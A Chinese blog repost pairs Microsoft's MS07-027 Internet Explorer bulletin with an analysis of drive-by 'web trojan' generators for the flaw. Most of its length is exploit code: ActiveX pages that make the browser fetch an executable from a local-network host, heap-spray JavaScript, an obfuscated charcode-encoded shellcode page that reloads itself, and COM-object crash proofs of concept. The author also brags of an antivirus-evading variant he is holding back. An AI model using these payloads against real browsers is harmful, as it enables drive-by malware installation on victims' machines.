• Microsoft 安全公告 MS07027


    Internet Explorer 的累积性安全更新 (931768)发布日期: 五月 8, 2007 | 更新日期: 五月 16, 2007 版本: 1.2 摘要 本文的目标读者: 使用 Microsoft Windows 的客户 漏洞的影响: 远程执行代码 最高严重等级: 严重 建议: 客户应立即应用此更新 安全更新替代: 本公告替代多个以前的安全更新。 有关详细信息,请参阅本公告的“常见问题 (FAQ)”部分。 注意事项: Microsoft 知识库文章 931768 介绍了客户在安装此安全更新时可能遇到的当前已知问题。 本文还介绍了这些问题的建议解决办法。 有关详细信息,请参阅 Microsoft 知识库文章 931768。 测试过的软件和安全更新下载位置: 受影响的软件: • Microsoft Windows 2000 Service Pack 4 • Microsoft Windows XP Service Pack 2 • Microsoft Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 • Microsoft Windows Server 2003 Service Pack 1 和 Microsoft Windows Server 2003 Service Pack 2 • Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Microsoft Windows Server 2003 SP2(用于基于 Itanium 的系统) • Microsoft Windows Server 2003 x64 Edition Service Pack 1 和 Microsoft Windows Server 2003 x64 Edition Service Pack 2 • Windows Vista • Windows Vista x64 Edition 测试过的 Microsoft Windows 组件: 受影响的组件: • Windows 2000 Service Pack 4 上的 Microsoft Internet Explorer 5.01 Service Pack 4 — 下载此更新 • 安装在 Windows 2000 Service Pack 4 上的 Microsoft Internet Explorer 6 Service Pack 1 — 下载此更新 • Windows XP Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新 • Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新 • Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新 • Windows Server 2003 SP1(用于基于 Itanium 的系统)和 Windows Server 2003 SP2(用于基于 Itanium 的系统)的 Microsoft Internet Explorer 6 — 下载此更新 • Windows Server 2003 x64 Edition Service Pack 1 和 Windows Server 2003 x64 Edition Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新 • Windows XP Service Pack 2 的 Microsoft Internet Explorer 7 — 下载此更新 • Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 的 Windows Internet Explorer 7 — 下载此更新 • Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 的 Windows Internet Explorer 7 — 下载此更新 • Windows Server 2003 SP1(用于基于 Itanium 的系统)和 Windows Server 2003 SP2(用于基于 Itanium 的系统)的 Windows Internet Explorer 7 — 下载此更新 • Windows Server 2003 x64 Edition Service Pack 1 和 Windows Server 2003 x64 Edition Service Pack 2 的 Windows Internet Explorer 7 — 下载此更新 • Windows Vista 中的 Windows Internet Explorer 7 — 下载此更新 • Windows Vista x64 Edition 中的 Windows Internet Explorer 7 — 下载此更新 ----------------------- MS07027漏洞网站挂马分析2007-05-25 19:11 5月16号微软更新了Internet Explorer的这个漏洞补丁。好像这个漏洞并不流行,不过网上已经MS07027漏洞利用的工具了,我所了解的有两款:MS07027网马生成器与最新MS07027+免杀ANI超强高效率网马生成器。 一、MS07027网马生成器会生成一个MS07027.html文件,内容如下: <html> <title> MS07-027 Oday </title> <body> <OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> </OBJECT> <script language="vbscript"> target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit" target.SessionAuthor="Andres Tarasco Acuna" target.SessionEmailContact="atarasco_at_gmail.com" target.SessionURL="http://127.0.0.1/0.exe" target.SaveAs "c:\boot.ini" <script src="inject.js"></script> </script> </body> </html> 这段代码最初是从好友Hysia的博客上看到的,不过这个MS07027网马生成器显然是在骗人!根本没把shellcode拿出来!shellcode应该在inject.js文件里,可是根本就没生成这个js文件,就一个MS07027.html!并且网上也没公布全部的shellcode……仅公布了一部分: function PrepMem() { //Standard Heap Spray Code var heapSprayToAddress = 0x06060606; var payLoadCode = HeapRepairCode + Shellcode; var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory = spraySlide + payLoadCode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } } function GetSystemVersion() { //Simple Detecting of OS version out of Jscript version: var ver = ""; ver += ScriptEngineMajorVersion(); ver += ScriptEngineMinorVersion(); ver += ScriptEngineBuildVersion(); if       ( ver<568820 ){ return("preSP2"); } else if ( ver<575730 ){ return("SP2"); } else return (0); } 二、还有那个所谓的“最新MS07027+免杀ANI超强高效率网马生成器”会生成fyms07027.htm这个文件。我的电脑没打这个补丁,于是开了IIS测试。有反应:第一次电脑直接崩溃重启……后面接着测试,发现这个代码的执行速度太慢了,等了半天也没出现预期的结果!就不测试了,fyms07027.htm的源码如下: <html> <body> <SCRIPT language="javascript"> function rechange(k) s=Split(k,",") t="" For i = 0 To UBound(s) t=t+Chr(eval(s(i))) Next rechange=t End Function t="115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,51,52,51,34,43,34,37,117,52,51,52,51,34,43,34,37,117,52,51,101,98,37,117,53,55,53,54,37,117,52,53,56,98,37,117,56,98,51,99,37,117,48,53,53,52,37,117,48,49,55,56,37,117,53,50,101,97,37,117,53,50,56,98,37,117,48,49,50,48,37,117,51,49,101,97,37,117,51,49,99,48,37,117,52,49,99,57,37,117,51,52,56,98,37,117,48,49,56,97,37,117,51,49,101,101,37,117,99,49,102,102,37,117,49,51,99,102,37,117,48,49,97,99,37,117,56,53,99,55,37,117,55,53,99,48,37,117,51,57,102,54,37,117,55,53,100,102,37,117,53,97,101,97,37,117,53,97,56,98,37,117,48,49,50,52,37,117,54,54,101,98,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,101,98,48,49,37,117,48,52,56,98,37,117,48,49,56,98,37,117,53,102,101,56,37,117,102,102,53,101,37,117,102,99,101,48,37,117,99,48,51,49,37,117,56,98,54,52,37,117,51,48,52,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,54,56,37,117,99,48,51,49,37,117,98,56,54,54,37,117,5 4,99,54,99,37,117,54,56,53,48,37,117,51,50,51,51,37,117,54,52,50,101,37,117,55,55,54,56,37,117,51,50,55,51,37,117,53,52,53,102,37,117,55,49,98,98,37,117,101,56,97,55,37,117,101,56,102,101,37,117,102,102,57,48,37,117,102,102,102,102,37,117,101,102,56,57,37,117,99,53,56,57,37,117,99,52,56,49,37,117,102,101,55,48,37,117,102,102,102,102,37,117,51,49,53,52,37,117,102,101,99,48,37,117,52,48,99,52,37,117,98,98,53,48,37,117,55,100,50,50,37,117,55,100,97,98,37,117,55,53,101,56,37,117,102,102,102,102,37,117,51,49,102,102,37,117,53,48,99,48,37,117,53,48,53,48,37,117,52,48,53,48,37,117,52,48,53,48,37,117,98,98,53,48,37,117,53,53,97,54,37,117,55,57,51,52,37,117,54,49,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,48,99,48,37,117,51,53,53,48,37,117,48,49,48,50,37,117,99,99,55,48,37,117,99,99,102,101,37,117,56,57,53,48,37,117,53,48,101,48,37,117,49,48,54,97,37,117,53,54,53,48,37,117,56,49,98,98,37,117,50,99,98,52,37,117,101,56,98,101,37,117,102,102,52,50,37,117,102,102,102,102,37,117,99,48,5 1,49,37,117,53,54,53,48,37,117,100,51,98,98,37,117,53,56,102,97,37,117,101,56,57,98,37,117,102,102,51,52,37,117,102,102,102,102,37,117,54,48,53,56,37,117,49,48,54,97,37,117,53,48,53,52,37,117,98,98,53,54,37,117,102,51,52,55,37,117,99,54,53,54,37,117,50,51,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,51,100,98,37,117,50,101,54,56,37,117,54,100,54,51,37,117,56,57,54,52,37,117,52,49,101,49,37,117,100,98,51,49,37,117,53,54,53,54,37,117,53,51,53,54,37,117,51,49,53,51,37,117,102,101,99,48,37,117,52,48,99,52,37,117,37,117,99,48,51,49,37,117,98,56,54,54,37,117,54,99,54,99,37,117,54,56,53,48,37,117,51,50,51,51,37,117,54,52,50,101,37,117,55,55,54,56,37,117,51,50,55,51,37,117,53,52,53,102,37,117,55,49,98,98,37,117,101,56,97,55,37,117,101,56,102,101,37,117,102,102,57,48,37,117,102,102,102,102,37,117,101,102,56,57,37,117,99,53,56,57,37,117,99,52,56,49,37,117,102,101,55,48,37,117,102,102,102,102,37,117,51,49,53,52,37,117,102,101,99,48,37,117,52,48,99,52,37,117,98,98,53,48,37,117,55,100,50 ,50,37,117,55,100,97,98,37,117,55,53,101,56,37,117,102,102,102,102,37,117,51,49,102,102,37,117,53,48,99,48,37,117,53,48,53,48,37,117,52,48,53,48,37,117,52,48,53,48,37,117,98,98,53,48,37,117,53,53,97,54,37,117,55,57,51,52,37,117,54,49,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,48,99,48,37,117,51,53,53,48,37,117,48,49,48,50,37,117,99,99,55,48,37,117,99,99,102,101,37,117,56,57,53,48,37,117,53,48,101,48,37,117,49,48,54,97,37,117,53,54,53,48,37,117,56,49,98,98,37,117,50,99,98,52,37,117,101,56,98,101,37,117,102,102,52,50,37,117,102,102,102,102,37,117,99,48,51,49,37,117,53,54,53,48,37,117,100,51,98,98,37,117,53,56,102,97,37,117,101,56,57,98,37,117,102,102,51,52,37,117,102,102,102,102,37,117,54,48,53,56,37,117,49,48,54,97,37,117,53,48,53,52,37,117,98,98,53,54,37,117,102,51,52,55,37,117,99,54,53,54,37,117,50,51,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,51,100,98,37,117,50,101,54,56,37,117,54,100,54,51,37,117,56,57,54,52,37,117,52,49,101,49,37,1 17,100,98,51,49,37,117,53,54,53,54,37,117,53,51,53,54,37,117,51,49,53,51,37,117,102,101,99,48,37,117,52,48,99,52,37,117,13,10,53,51,53,48,37,117,53,51,53,51,37,117,53,51,53,51,37,117,53,51,53,51,37,117,53,51,53,51,37,117,54,97,53,51,37,117,56,57,52,52,37,117,53,51,101,48,37,117,53,51,53,51,37,117,53,52,53,51,37,117,53,51,53,48,37,117,53,51,53,51,37,117,53,51,52,51,37,117,53,51,52,98,37,117,53,49,53,51,37,117,56,55,53,51,37,117,98,98,102,100,37,117,100,48,50,49,37,117,100,48,48,53,37,117,100,102,101,56,37,117,102,102,102,101,37,117,53,98,102,102,37,117,99,48,51,49,37,117,53,48,52,56,37,117,98,98,53,51,37,117,99,98,52,51,37,117,53,102,56,100,37,117,99,102,101,56,37,117,102,102,102,101,37,117,53,54,102,102,37,117,101,102,56,55,37,117,49,50,98,98,37,117,54,100,54,98,37,117,101,56,100,48,37,117,102,101,99,50,37,117,102,102,102,102,37,117,99,52,56,51,37,117,54,49,53,99,37,117,56,57,101,98,34,41,59,10,13,10,98,105,103,98,108,111,99,107,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,68,48,68,37,117,48,68,48,6 8,34,41,59,10,13,10,104,101,97,100,101,114,115,105,122,101,32,61,32,50,48,59,10,13,10,115,108,97,99,107,115,112,97,99,101,32,61,32,104,101,97,100,101,114,115,105,122,101,43,115,104,101,108,108,99,111,100,101,46,108,101,110,103,116,104,13,10,10,119,104,105,108,101,32,40,98,105,103,98,108,111,99,107,46,108,101,110,103,116,104,60,115,108,97,99,107,115,112,97,99,101,41,32,98,105,103,98,108,111,99,107,43,61,98,105,103,98,108,111,99,107,59,13,10,10,102,105,108,108,98,108,111,99,107,32,61,32,98,105,103,98,108,111,99,107,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,108,97,99,107,115,112,97,99,101,41,59,10,98,108,111,99,107,32,61,32,98,105,103,98,108,111,99,107,46,115,117,98,115,116,114,105,110,103,40,48,44,32,98,105,103,98,108,111,99,107,46,108,101,110,103,116,104,45,115,108,97,99,107,115,112,97,99,101,41,59,13,10,10,119,104,105,108,101,40,98,108,111,99,107,46,108,101,110,103,116,104,43,115,108,97,99,107,115,112,97,99,101,60,48,120,52,48,48,48,48,41,32,98,108,111,99,107,32,61,32,98,108,111,99,107,43,98,108,1 11,99,107,43,102,105,108,108,98,108,111,99,107,59,13,10,10,109,101,109,111,114,121,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,10,102,111,114,32,40,105,61,48,59,105,60,55,53,48,59,105,43,43,41,32,109,101,109,111,114,121,91,105,93,32,61,32,98,108,111,99,107,32,43,32,115,104,101,108,108,99,111,100,101,59,10" i=t execute(rechange(I)) </SCRIPT> <object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object> <!--这个object不是MS07027漏洞的object,这要注意--> Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit by the FrSIRT < http://www.fy.com > Solution - http://www.fy.com/</body><script>location.reload();</script> </html> 完全解密后,发现是奇怪的乱码。不知道为什么……谁有兴趣可以去解密,也可以运行这段代码看看。估计就是由于这些原因限制了MS07027漏洞的利用吧。看了好多可以利用的漏洞,还是MS07017与MS06014这两个漏洞经典! --------------- 今天终于调试出来了,效果与06014基本一样,全过杀毒软件,只公开,部分调试代码,因为怕天下大乱,所以暂时只公布部分的调试代码! <html> <title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title> <body> <OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> </OBJECT> <script language="vbscript"> //next script is converted to UTF16 target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit" target.SessionAuthor="Andres Tarasco Acuna" target.SessionEmailContact="atarasco_at_gmail.com" target.SessionURL="http://192.168.1.168/1.exe" target.SaveAs "c:\boot.ini" <script src="inject.js"></script> </script> </body> </html> 以下是部分shellcode ===========///ms07-027 exploit ///================ function PrepMem() { //Standard Heap Spray Code var heapSprayToAddress = 0x06060606; var payLoadCode = HeapRepairCode + Shellcode; var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + payLoadCode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } } function GetSystemVersion() { //Simple Detecting of OS version out of Jscript version: var ver = ""; ver += ScriptEngineMajorVersion(); ver += ScriptEngineMinorVersion(); ver += ScriptEngineBuildVersion(); if      ( ver<568820 ){ return("preSP2"); } else if ( ver<575730 ){ return("SP2"); } else return (0); } 我会做个演示动画给大家看的,这只是部分代码! ------------------------- 测试方法: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! =============== CHTSKDIC.DLL.htm start ================ <!-- // Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability // tested XP SP2 CN // http://www.xsec.org // nop (nop#xsec.org) // CLSID: {BE4191FB-59EF-4825-AEFC-109727951E42} // Info: ImeSingleKanjiDict// ProgID: ID2 // InprocServer32: C:\WINDOWS\IME\CHTIME\APPLETS\CHTSKDIC.DLL !--> <html><body> <object classid="CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}" ></object> </body></html> =============== CHTSKDIC.DLL.htm end ==================
  • 相关阅读:
    代码重构编译---make
    clickhouse日期函数
    连续登陆天数+最大登陆天数
    clickhouse基本使用
    数组
    CK优化
    Hive查询优化~布隆过滤器使用
    Presto常见问题优化
    Presto原理解析
    几种排序说明
  • 原文地址:https://www.cnblogs.com/adodo1/p/4327117.html
Copyright © 2020-2023  润新知